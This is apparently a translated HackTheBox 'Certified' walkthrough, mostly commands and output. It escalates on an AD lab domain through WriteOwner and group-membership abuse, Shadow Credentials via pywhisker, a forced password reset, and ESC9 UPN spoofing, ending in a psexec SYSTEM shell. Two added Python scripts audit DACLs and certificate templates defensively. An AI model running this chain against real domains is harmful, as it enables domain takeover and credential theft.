HackTheBox Certified Walkthrough

Putting up with a glacially slow connection and following the forum hints, I finished HTB's Certified and found that DAC (discretionary access control) is genuinely interesting; it immediately made me realise I need to catch up on Active Directory penetration testing.

This is a fairly detailed walkthrough I wrote. It is a record of my own learning process and may also serve as a reference for friends who are just getting into this area.

The usual opening routine: scan the ports.

└─$ nmap -sV -sC -Pn  -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 13:10 CST
Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.14s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-06 12:04:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-06T12:06:20+00:00; +6h47m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-06T12:06:21+00:00; +6h47m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T12:06:20+00:00; +6h47m17s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T12:06:21+00:00; +6h47m17s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
60276/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

As stated on the HTB site, an initial username and password are provided as the entry point.

The first task is to enumerate usernames. There are two methods; the first uses rpcclient and is the more elegant one.

└─$ rpcclient -U "certified.htb/judith.mader%judith09" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[judith.mader] rid:[0x44f]
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]

The second method is RID brute-forcing, which yields more complete information (groups as well as users).

└─$ netexec smb $IP -u 'judith.mader' -p 'judith09' --rid-brute
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             500: CERTIFIED\Administrator (SidTypeUser)
SMB         10.10.11.41     445    DC01             501: CERTIFIED\Guest (SidTypeUser)
SMB         10.10.11.41     445    DC01             502: CERTIFIED\krbtgt (SidTypeUser)
SMB         10.10.11.41     445    DC01             512: CERTIFIED\Domain Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             513: CERTIFIED\Domain Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             514: CERTIFIED\Domain Guests (SidTypeGroup)
SMB         10.10.11.41     445    DC01             515: CERTIFIED\Domain Computers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             516: CERTIFIED\Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             517: CERTIFIED\Cert Publishers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             518: CERTIFIED\Schema Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             519: CERTIFIED\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.41     445    DC01             521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             525: CERTIFIED\Protected Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             526: CERTIFIED\Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             527: CERTIFIED\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             553: CERTIFIED\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1000: CERTIFIED\DC01$ (SidTypeUser)
SMB         10.10.11.41     445    DC01             1101: CERTIFIED\DnsAdmins (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1103: CERTIFIED\judith.mader (SidTypeUser)
SMB         10.10.11.41     445    DC01             1104: CERTIFIED\Management (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1105: CERTIFIED\management_svc (SidTypeUser)
SMB         10.10.11.41     445    DC01             1106: CERTIFIED\ca_operator (SidTypeUser)
SMB         10.10.11.41     445    DC01             1601: CERTIFIED\alexander.huges (SidTypeUser)
SMB         10.10.11.41     445    DC01             1602: CERTIFIED\harry.wilson (SidTypeUser)
SMB         10.10.11.41     445    DC01             1603: CERTIFIED\gregory.cameron (SidTypeUser)

On some easy-level boxes, sensitive information is leaked in the account description field. I checked it as a matter of routine but found nothing; this is a medium box after all, so it must be a different trick.

└─$ rpcclient -U  "judith.mader"  $IP -c "querydispinfo"
Password for [WORKGROUP\judith.mader]:
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfec RID: 0x641 acb: 0x00000210 Account: alexander.huges        Name: Alexander Huges   Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: ca_operator    Name: Operator CA       Desc: (null)
index: 0xfee RID: 0x643 acb: 0x00000210 Account: gregory.cameron        Name: Gregory Cameron   Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfed RID: 0x642 acb: 0x00000210 Account: harry.wilson   Name: Harry Wilson      Desc: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: judith.mader   Name: Judith Mader      Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: management_svc Name: management service        Desc: (null)

A look at SMB shows no sensitive shares that would give us a foothold. On a machine like this, with no FTP, no interesting SMB shares, no HTTP and no other unusual services, LDAP is the only way in.

└─$ smbmap -H $IP -u 'judith.mader' -p 'judith09'

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.41:445 Name: certified.htb             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Next, collect BloodHound data. judith.mader cannot log into the box, so we have no shell and cannot upload SharpHound; the only option is remote collection with netexec.

└─$ netexec ldap certified.htb -u  judith.mader -p judith09 --bloodhound --collection All --dns-server $IP
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09
LDAP        10.10.11.41     389    DC01             Resolved collection methods: session, dcom, psremote, objectprops, container, acl, trusts, group, localadmin, rdp
[14:26:41] ERROR    Unhandled exception in computer DC01.certified.htb processing: The NETBIOS connection with the remote host timed out.                      computers.py:269
LDAP        10.10.11.41     389    DC01             Done in 00M 36S
LDAP        10.10.11.41     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_XXXXXX_bloodhound.zip

With this zip file in hand, we can analyse it locally in the BloodHound GUI.

If this is your first time using the BloodHound GUI and neo4j, see https://www.kali.org/tools/bloodhound/.
The unzipped archive contains several .json files. They can be inspected individually with a JSON viewer, but that will not let you analyse the relationships between nodes the way BloodHound does.

The exploitation below falls into roughly four stages.

Stage 1: add the judith.mader user to the Management group

First look at the judith.mader user. Note that it holds WriteOwner over the Management group, which means we can take ownership of the group and from there change its membership. We can also see that the Management group has GenericWrite over the management_svc user, so an attack chain forms. Of course, this is only the beginning; the chain ends at Administrator.

Currently the Management group's only member is management_svc.

Using the WriteOwner right, set judith.mader as the owner of the Management group:

$ bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on Management

Then grant judith.mader the WriteMembers right, i.e. the right to modify the Management group's membership. Before and after the change, you can inspect the permissions from the command line (or in BloodHound) to see what changed.

└─$ impacket-dacledit -action 'read'  -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[3] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE
[*]     Access mask               : WriteOwner (0x80000)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
...
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',                                                                                                                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20241106-161817.bak  
[*] DACL modified successfully!

└─$ impacket-dacledit -action 'read'  -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[0] info                
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : None
[*]     Access mask               : ReadProperty, WriteProperty
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : Self-Membership (bf9679c0-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[4] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE
[*]     Access mask               : WriteOwner (0x80000)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
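As a defender-side check, here is an added example (not part of the original post and not Impacket's own code) that parses the `-action read` output of impacket-dacledit in the format shown above and flags allow-ACEs granting takeover rights (WriteOwner, WriteDacl, GenericAll, GenericWrite, or WriteProperty scoped to the member attribute, i.e. WriteMembers) to trustees outside an allow-list of administrative SIDs. The allow-list and the sample input (the two judith.mader ACEs from the output above) are assumptions for illustration.

```python
import re
from dataclasses import dataclass, field

# Rights that let a trustee take over an object outright (names as dacledit prints them).
TAKEOVER_MASKS = {"WriteOwner", "WriteDacl", "GenericAll", "GenericWrite"}
# Schema GUID of the 'member' attribute; WriteProperty scoped to it is WriteMembers.
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"
# Trustees expected to hold such rights (assumed allow-list): Domain Admins (RID 512),
# Enterprise Admins (RID 519), BUILTIN\Administrators and LocalSystem.
EXPECTED_RIDS = {"512", "519"}
EXPECTED_SIDS = {"S-1-5-32-544", "S-1-5-18"}

@dataclass
class Ace:
    index: int
    ace_type: str = ""
    mask: set = field(default_factory=set)
    object_type: str = ""
    trustee: str = ""
    sid: str = ""

def parse_dacledit(text: str) -> list[Ace]:
    """Parse the '[*]   ACE[n] info' blocks printed by 'impacket-dacledit -action read'."""
    aces: list[Ace] = []
    for line in text.splitlines():
        head = re.match(r"\[\*\]\s+ACE\[(\d+)\] info", line)
        if head:
            aces.append(Ace(index=int(head.group(1))))
            continue
        kv = re.match(r"\[\*\]\s+(.+?)\s+:\s+(.*)", line)
        if not kv or not aces:
            continue
        key, val, ace = kv.group(1), kv.group(2).strip(), aces[-1]
        if key == "ACE Type":
            ace.ace_type = val
        elif key == "Access mask":  # 'WriteOwner (0x80000)' or 'ReadProperty, WriteProperty'
            ace.mask = {re.sub(r"\s*\(.*\)", "", p).strip() for p in val.split(",")}
        elif key == "Object type (GUID)":  # 'Self-Membership (bf9679c0-...)'
            guid = re.search(r"\(([0-9a-f-]{36})\)", val)
            ace.object_type = guid.group(1) if guid else val
        elif key == "Trustee (SID)":  # 'judith.mader (S-1-5-21-...-1103)'
            who = re.match(r"(.*?)\s*\((S-[\d-]+)\)", val)
            ace.trustee, ace.sid = (who.group(1), who.group(2)) if who else (val, val)
    return aces

def is_expected_admin(sid: str) -> bool:
    return sid in EXPECTED_SIDS or sid.rsplit("-", 1)[-1] in EXPECTED_RIDS

def takeover_findings(text: str) -> list[tuple[int, str, str]]:
    """(ACE index, trustee, rights) for allow-ACEs granting takeover rights to non-admins."""
    findings = []
    for ace in parse_dacledit(text):
        if not ace.ace_type.startswith("ACCESS_ALLOWED") or is_expected_admin(ace.sid):
            continue  # deny ACEs grant nothing; admins are expected to hold these rights
        rights = sorted(ace.mask & TAKEOVER_MASKS)
        if "WriteProperty" in ace.mask and ace.object_type == MEMBER_ATTR_GUID:
            rights.append("WriteMembers")
        if rights:
            findings.append((ace.index, ace.trustee, ",".join(rights)))
    return findings

# Sample input: the two judith.mader ACEs from the dacledit output above.
SAMPLE = """\
[*]   ACE[0] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     Access mask               : ReadProperty, WriteProperty
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : Self-Membership (bf9679c0-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[4] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     Access mask               : WriteOwner (0x80000)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
"""
```

Running `takeover_findings(SAMPLE)` reports both the WriteOwner ACE and the freshly added WriteMembers ACE for judith.mader, which is exactly the pair a periodic DACL audit of privileged groups should surface.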

Next, add judith.mader to the Management group.

┌──(kali㉿mykali)-[~/Downloads/pywhisker]
└─$ net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

┌──(kali㉿mykali)-[~/Downloads/pywhisker]
└─$ net rpc group members "Management" -U "certified.htb/judith.mader%judith09" -S "DC01.certified.htb"
CERTIFIED\judith.mader
CERTIFIED\management_svc

Now we collect the BloodHound data once more and reload it into BloodHound. The new edges that appear are the changes we just made.

Stage 2: take full control of the management_svc user

The technique used below is the Shadow Credentials attack. Using pywhisker, we write an entry into the msDS-KeyCredentialLink attribute of the management_svc user.

Once a sufficiently privileged account has been obtained, a Shadow Credential (an msDS-KeyCredentialLink entry) is added to the target user; the relevant tooling then yields a .pfx certificate-and-key file, which is used to request a TGT for the target user and, from that, recover the user's NTLM hash.
https://mrwq.github.io/aggregate-paper/butian/%E7%BA%A2%E9%98%9F%E5%9F%9F%E6%B8%97%E9%80%8F%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%8A%80%E6%9C%AF%EF%BC%9AShadow%20Credentials/

Before running it, we can see that this attribute on management_svc is empty.

└─$ pywhisker  -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

Run the add operation. It also writes a .pfx file into the current directory, and the output gives the password that goes with it.

└─$ pywhisker -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: b2855c96-4e22-d4f1-d494-46c4849a50c6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: RBgxyQHq.pfx
[*] Must be used with password: I3hqGmxeczDjW4TpBrc3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Listing again shows that the operation succeeded.

└─$ pywhisker  -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Listing devices for management_svc
[*] DeviceID: b2855c96-4e22-d4f1-d494-46c4849a50c6 | Creation Time (UTC): 2024-11-07 07:23:30.440907

Obtain a TGT for management_svc.

└─$ gettgtpkinit.py certified.htb/management_svc -cert-pfx RBgxyQHq.pfx -pfx-pass 'I3hqGmxeczDjW4TpBrc3' management_svc.ccache
2024-11-06 18:27:22,615 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-06 18:27:22,625 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-11-06 11:39:38,959 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-11-06 11:39:38,959 minikerberos INFO     59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
INFO:minikerberos:59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
2024-11-06 11:39:38,961 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Finally, obtain management_svc's NT hash from the TGT saved in the previous step.

└─$ export KRB5CCNAME=management_svc.ccache
└─$ getnthash.py certified.htb/management_svc -key 59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
/opt/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/opt/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
<management_svc hash>

Note that the commands above are very sensitive to clock synchronisation. There is a pitfall here: we are on Beijing time while HTB uses UTC, so you must change the time zone to UTC, stop the local time-sync service (if your machine has one enabled; it may be ntp, chrony or similar), and then sync with the HTB box.

└─$ sudo systemctl disable chrony
Synchronizing state of chrony.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install disable chrony

└─$ sudo ntpdate -u 10.10.11.41
2024-11-06 17:03:32.282248 (+0000) +24466.087108 +/- 0.149565 10.10.11.41 s1 no-leap
CLOCK: time stepped by 24466.087108

At this point we have full control of the management_svc user.

Stage 3: take control of the ca_operator user

Looking at BloodHound, management_svc has GenericAll over the ca_operator user.

We can therefore use the management_svc account to change ca_operator's password.

└─$ pth-net rpc password "ca_operator" "pass1234" -U "certified.htb"/"management_svc"%"<management_svc hash>":"<management_svc hash>" -S "DC01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

Verify that the change succeeded.

└─$ netexec smb $IP -u 'ca_operator' -p 'pass1234'
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:pass1234

Stage 4: escalate to Administrator with ESC9

For background on ESC9, see https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

To check whether the preconditions for ESC9 are met, first pull the target's certificate template information down to the local machine.

└─$ certipy find -u judith.mader@certified.htb -p judith09 -dc-ip $IP
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20241107174513_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241107174513_Certipy.txt'
[*] Saved JSON output to '20241107174513_Certipy.json

Open the generated 20241107174513_Certipy.json with whatever tool you prefer. As shown in the figure, under Certificate Templates -> CertifiedAuthentication -> Enrollment Flag you will find NoSecurityExtension. This is the key precondition: with this flag the issued certificate carries no SID security extension, so the KDC falls back to mapping it by UPN.
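As a defender-side check, here is an added example (not part of the original post and not Certipy's own code) that reads a Certipy-style JSON export and lists the enabled client-authentication templates whose enrollment flag carries NoSecurityExtension, i.e. the template-side ESC9 precondition, together with who may enroll in them. The field names mirror Certipy's text output quoted above, but the exact JSON layout is an assumption and the sample data is constructed; the check also accepts the raw msPKI-Enrollment-Flag integer, which goes beyond the page's case.

```python
import json

CT_FLAG_NO_SECURITY_EXTENSION = 0x80000  # msPKI-Enrollment-Flag bit (MS-CRTD section 2.26)

def has_no_security_extension(enrollment_flag) -> bool:
    """Accept either Certipy's list of flag names or the raw msPKI-Enrollment-Flag integer."""
    if isinstance(enrollment_flag, int):
        return bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)
    return "NoSecurityExtension" in enrollment_flag

def esc9_templates(certipy_json: str) -> list[dict]:
    """Templates meeting the template-side ESC9 preconditions: enabled, usable for
    client authentication, and flagged NoSecurityExtension.  Each hit lists who may
    enroll, because any such principal that an attacker can write to becomes the
    victim account whose UPN gets rewritten.  The KDC-side condition (the DC's
    StrongCertificateBindingEnforcement registry value not being 2, Full Enforcement)
    cannot be judged from this file and must be checked on the DC."""
    data = json.loads(certipy_json)
    hits = []
    for tmpl in data.get("Certificate Templates", {}).values():
        if not tmpl.get("Enabled") or not tmpl.get("Client Authentication"):
            continue
        if not has_no_security_extension(tmpl.get("Enrollment Flag", [])):
            continue
        rights = (tmpl.get("Permissions", {})
                      .get("Enrollment Permissions", {})
                      .get("Enrollment Rights", []))
        # Principals are printed as 'DOMAIN\name'; keep just the name for reporting.
        hits.append({"template": tmpl["Template Name"],
                     "enrollers": sorted(r.split("\\", 1)[-1] for r in rights)})
    return hits

# Constructed sample in the layout assumed above; only CertifiedAuthentication is a hit.
SAMPLE_JSON = json.dumps({
    "Certificate Templates": {
        "0": {
            "Template Name": "CertifiedAuthentication",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollment Flag": ["NoSecurityExtension", "AutoEnrollment", "PublishToDs"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["CERTIFIED.HTB\\operator ca",
                                      "CERTIFIED.HTB\\Domain Admins"]}},
        },
        "1": {
            "Template Name": "User",
            "Enabled": True,
            "Client Authentication": True,
            "Enrollment Flag": ["AutoEnrollment", "PublishToDs", "IncludeSymmetricAlgorithms"],
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["CERTIFIED.HTB\\Domain Users"]}},
        },
        "2": {  # same flag expressed as a raw bitmask, but the template is disabled
            "Template Name": "LegacyRawFlags",
            "Enabled": False,
            "Client Authentication": True,
            "Enrollment Flag": 0x80000 | 0x1,
        },
    }
})
```

Any template the function returns deserves either removal of the NoSecurityExtension flag or, on the DC, StrongCertificateBindingEnforcement set to 2 so that UPN-only mapping is refused.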

Next we need to change ca_operator's UPN. First look at the current value, which is ca_operator@certified.htb.

└─$ ldapsearch -x -H ldap://$IP -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName
# extended LDIF
#
# LDAPv3
# base <DC=certified,DC=htb> with scope subtree
# filter: (sAMAccountName=ca_operator)
# requesting: userPrincipalName 
#

# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: ca_operator@certified.htb

# numReferences: 

Now make the change, setting ca_operator's UPN to Administrator.

└─$ certipy account update -username management_svc@certified.htb -hashes <management_svc hash> -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

Check ca_operator's UPN after the update.

└─$ ldapsearch -x -H ldap://$IP -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName

# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: Administrator

Why change the UPN? That will become clear in a moment. Now we can use the ca_operator user to obtain a .pfx for Administrator.

└─$ certipy req -username ca_operator@certified.htb -p pass1234 -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '10.0.2.3'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx

Use administrator.pfx to obtain the Administrator hash. As noted above, without the UPN change we would get ca_operator's hash here instead, because the certificate would be mapped back to ca_operator.

└─$ certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:<root hash>

Finally, use the Administrator hash to get a shell and grab the root flag.

└─$ impacket-psexec administrator@$IP -hashes :<root hash>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.41.....
[*] Found writable share ADMIN$
[*] Uploading file kcWxAXhj.exe
[*] Opening SVCManager on 10.10.11.41.....
[*] Creating service EZkb on 10.10.11.41.....
[*] Starting service EZkb.....
[!] Press help for extra shell commands
heMicrosoft Windows [Version 10.0.17763.6414]
lp(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami /priv
'helpwhoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32> whoami
nt authority\system

Closing thoughts: Windows domain penetration really is deep and broad, and there are a lot of fundamentals to fill in. I'll keep learning as time allows!

Main reference: https://breachforums.st/Thread-Certified-HTB-Medium
